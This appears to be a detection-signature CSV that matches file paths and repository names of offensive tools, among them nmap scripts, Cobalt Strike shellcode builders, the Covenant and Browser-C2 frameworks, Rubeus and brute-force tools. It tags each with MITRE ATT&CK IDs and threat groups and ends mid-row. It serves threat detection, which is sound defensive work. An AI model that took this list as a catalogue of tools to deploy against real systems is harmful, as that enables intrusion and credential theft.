"*/broadcast-ms-sql-discover.nse*",".{0,1000}\/broadcast\-ms\-sql\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-netbios-master-browser.nse*",".{0,1000}\/broadcast\-netbios\-master\-browser\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-networker-discover.nse*",".{0,1000}\/broadcast\-networker\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-novell-locate.nse*",".{0,1000}\/broadcast\-novell\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-ospf2-discover.nse*",".{0,1000}\/broadcast\-ospf2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-pc-anywhere.nse*",".{0,1000}\/broadcast\-pc\-anywhere\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-pc-duo.nse*",".{0,1000}\/broadcast\-pc\-duo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-pim-discovery.nse*",".{0,1000}\/broadcast\-pim\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-ping.nse*",".{0,1000}\/broadcast\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-pppoe-discover.nse*",".{0,1000}\/broadcast\-pppoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-rip-discover.nse*",".{0,1000}\/broadcast\-rip\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-ripng-discover.nse*",".{0,1000}\/broadcast\-ripng\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-sonicwall-discover.nse*",".{0,1000}\/broadcast\-sonicwall\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-sybase-asa-discover.nse*",".{0,1000}\/broadcast\-sybase\-asa\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-tellstick-discover.nse*",".{0,1000}\/broadcast\-tellstick\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-upnp-info.nse*",".{0,1000}\/broadcast\-upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-versant-locate.nse*",".{0,1000}\/broadcast\-versant\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-wake-on-lan.nse*",".{0,1000}\/broadcast\-wake\-on\-lan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-wpad-discover.nse*",".{0,1000}\/broadcast\-wpad\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-wsdd-discover.nse*",".{0,1000}\/broadcast\-wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-xdmcp-discover.nse*",".{0,1000}\/broadcast\-xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Bropper.git*",".{0,1000}\/Bropper\.git.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*/bropper.py*",".{0,1000}\/bropper\.py.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*/Browser-C2*",".{0,1000}\/Browser\-C2.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","100","27","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*/browserhistory.csv*",".{0,1000}\/browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/Brute/BruteStager*",".{0,1000}\/Brute\/BruteStager.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/bruteforce.py*",".{0,1000}\/bruteforce\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/bruteforce-ftp.py*",".{0,1000}\/bruteforce\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/bruteforce-http.py*",".{0,1000}\/bruteforce\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/Bruteforcer.*",".{0,1000}\/Bruteforcer\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/bruteforce-rdp.py*",".{0,1000}\/bruteforce\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/bruteforce-smb.py*",".{0,1000}\/bruteforce\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/bruteforce-ssh.py*",".{0,1000}\/bruteforce\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/bruteratel*",".{0,1000}\/bruteratel.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 
- T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/BruteSploit*",".{0,1000}\/BruteSploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/brutespray.git*",".{0,1000}\/brutespray\.git.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*/brutespray/*",".{0,1000}\/brutespray\/.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*/brutespray/*",".{0,1000}\/brutespray\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/brutespray_*",".{0,1000}\/brutespray_.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*/BruteStager.cs*",".{0,1000}\/BruteStager\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/BucketLoot.git*",".{0,1000}\/BucketLoot\.git.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - 
TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*/build/encrypted_shellcode*",".{0,1000}\/build\/encrypted_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/build/formatted_shellcode*",".{0,1000}\/build\/formatted_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/build/shellcode*",".{0,1000}\/build\/shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" 
"*/BuildBOFs/*",".{0,1000}\/BuildBOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*/burp/releases/community/latest*",".{0,1000}\/burp\/releases\/community\/latest.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. 
and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/burp-api/*",".{0,1000}\/burp\-api\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/burp-Dirbuster*",".{0,1000}\/burp\-Dirbuster.{0,1000}","offensive_tool_keyword","dirbuster","Dirbuster plugin for Burp Suite","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/vulnersCom/burp-Dirbuster","1","1","N/A","N/A","1","70","28","2017-02-22T08:31:32Z","2017-02-22T08:24:05Z" "*/burpee.py*",".{0,1000}\/burpee\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","339","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" "*/BurpExtender.java*",".{0,1000}\/BurpExtender\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/burp-proxy*",".{0,1000}\/burp\-proxy.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
